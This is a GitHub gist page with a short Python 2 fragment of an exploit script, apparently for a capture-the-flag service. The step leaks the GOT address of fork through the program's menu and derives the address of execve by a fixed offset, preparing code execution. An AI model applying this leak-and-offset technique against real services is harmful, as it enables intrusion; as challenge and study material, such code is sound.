Skip to content

Instantly share code, notes, and snippets.

Last active December 15, 2015 18:39
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
# Step 1c--- Get the address of execve
LEAKFORKADDR = dword_to_bitstring(location_got_fork)
nc.read_until("Your choice: ")
nc.write("1" + "\n")
nc.read_until("Insert name: ")
nc.read_until("Uranium in nuclear plant \"")
addrfork = bitstring_to_dword(nc.read_until(":ENFORK:")[4:-8])
addrexecve = addrfork + 0x320
print "[+] Address of fork :", hex(addrfork)
print " > Address of execve :", hex(addrexecve)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment